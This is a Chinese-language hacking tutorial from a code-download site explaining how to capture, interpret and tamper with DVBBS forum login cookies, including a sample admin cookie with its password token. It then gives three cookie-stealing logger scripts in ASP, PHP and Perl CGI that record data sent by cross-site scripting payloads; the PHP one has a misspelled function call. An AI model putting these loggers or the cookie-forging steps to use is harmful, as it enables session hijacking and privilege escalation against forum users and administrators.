首 页
┆
源码下载
┆
IT学院
┆
字体下载
┆
模板下载
┆
源码发布
┆
广告合作
┆
网站地图
┆
虚拟主机
┆
中文域名
►
设为首页
►
加入收藏
►
联系我们
源码下载
>>
ASP源码
|
PHP源码
|
ASP.net源码
|
JSP源码
|
CGI源码
|
VC/C++源码
|
VB源码
|
Delphi源码
|
Flash源码
文章学院
>>
网络编程
|
网页设计
|
图形图象
|
数据库
|
服务器
|
网络媒体
|
网络安全
|
操作系统
|
办公软件
|
软件开发
|
黑客知识
字体下载
>>
精制字体
|
非英字体
|
艺术字体
|
著名字体
|
哥特式
|
简单字体
|
手写体
|
节假日
|
图案字体
|
精度像素
|
中文字体
模板下载
>>
企业门户
|
数码网络
|
休闲娱乐
|
影视音乐
|
旅游名胜
|
文化艺术
|
电子商务
|
个性展示
|
登陆导航
|
Flash模板
源码搜索
文章搜索
字体搜索
模板搜索
►►
您当前的位置:
源码园
→
IT学院
→
黑客知识
→
黑客入门
→ 文章内容
教你怎样从cookie里获取信息--cookie,获取,信息
作者:佚名 来源:网上收集 发布时间:2006-5-11 19:27:26
网站安全版有人在问,怎么从cookies中提取信息,我用动网论坛的来说明一下。
使用工具:
1:WsockExpert,用来抓取cookies。
2:动网论坛7.1 sp1。
抓取cookies步骤:打开动网论坛的页面,用户登陆以后,打开WsockExpert后点击“打开进程“,选择ie中的动网论坛的页面,然后再到动网页面中随便点击一个版块,这时候WsockExpert中就有显示了。
其中cookies信息是
DvForum=userid=1&usercookies=0&userhidden=2&password=ChXJBnM9970wE067&userclass=%B9%DC%C0%ED%D4%B1&username=admin&StatUserID=4517632; ASPSESSIONIDCATCRCBA=KLOBIMEDCHPOEKGAHMLPBLJK; upNum=0
参数说明
DvForum是动网论坛。
userid=1表示你的用户名的id是1,也就是这个论坛的第1个用户。
userhidden如果是1表示隐身,2表示上线。
Password这里是ChXJBnM9970wE067,并不是真正登陆密码的md5加密以后的值。ChXJBnM9970wE067其实就是数据库中的TruePassWord中的值。有些获取的cookies中这里可能是明文密码或者是md5加密以后的密码,能不能破解就看你的运气了。
userclass=%B9%DC%C0%ED%D4%B1,表示用户级别是管理员,当然其它的级别也是同样的原理。
username=admin就不用我说了吧。
upNum=0表示你上传的文件数量,如果每天上传数量有限制的话,修改这里可能有些cookies会有效的。
修改cookies的工具: minibrowser等可以修改cookies的工具。
盗取cookies的asp代码
set lP=server.createObject("Adodb.Stream")
lP.Open
lP.Type=2
lP.CharSet="gb2312"
lP.writetext request.Servervariables("QUERY_STRING")
lP.SaveToFile server.mappath(strfilename),2
lP.Close
set lP=nothing
%>
盗取cookies的php代码
<?php
$info = getenv("QUERY_STRING");
if ($info) {
$info=urldecode($info);
$fp = fopen("info.txt","a");
fwirte($fp,$info."\n\n\n\n");
fclose($fp);
}
?>
盗取cookies的cgi代码
#!/usr/bin/perl
# evil_cookie_logger.cgi
# remote cookie logging CGI coded by BrainRawt
#
# NOTE: coded as a proof of concept script when testing for
# cross-site scripting vulnerabilities.
#玄猫摘自http://www.infosecurity.org.cn/c ... ticle0128051326.htm
$borrowed_info = $ENV{'QUERY_STRING'};
$borrowed_info =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
open(EVIL_COOKIE_LOG, ">>evil_cookie_log") or print "Content-type:
text/html\n\n something went wrong\n";
print EVIL_COOKIE_LOG "$borrowed_info\n";
print "Content-type: text/html\n\n";
close(EVIL_COOKIE_LOG);
[] [
返回上一页
] [
打 印
]
上一篇文章:
正确的4种挂马方式--挂马
下一篇文章:
破解网页鼠标右键被禁用的最新方法--破解,网页,鼠标,右键,禁用
相关文章:
[图文]
教你怎样从cookie里获取信息--cookie,获取,信...
关于本站
-
网站帮助
-
广告合作
-
下载声明
-
友情连接
-
网站地图
-
源码发布
Copyright © 2003-2009
Ymyasp
.Com
. All Rights Reserved .
备案序号:粤ICP备07029071号